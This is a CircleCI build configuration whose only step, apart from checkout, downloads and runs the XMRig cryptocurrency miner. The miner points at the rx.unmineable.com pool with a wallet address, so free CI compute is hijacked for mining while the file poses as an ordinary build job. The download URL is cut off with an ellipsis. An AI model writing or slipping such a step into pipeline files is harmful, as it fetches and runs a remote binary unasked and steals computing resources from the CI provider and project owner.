version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: mkdir XMRIG && cd XMRIG && wget https://github.com/xmrig/xmrig/releas... && tar xf xmrig-6.7.0-bionic-x64.tar.gz && cd xmrig-6.7.0 && ./xmrig --donate-level 1 -o rx.unmineable.com:3333 -u SHIB:0xd241cc40aac2fd53439f8f5a8b3cdaf16d00cacf.lokizinhos -p x -k -a rx/0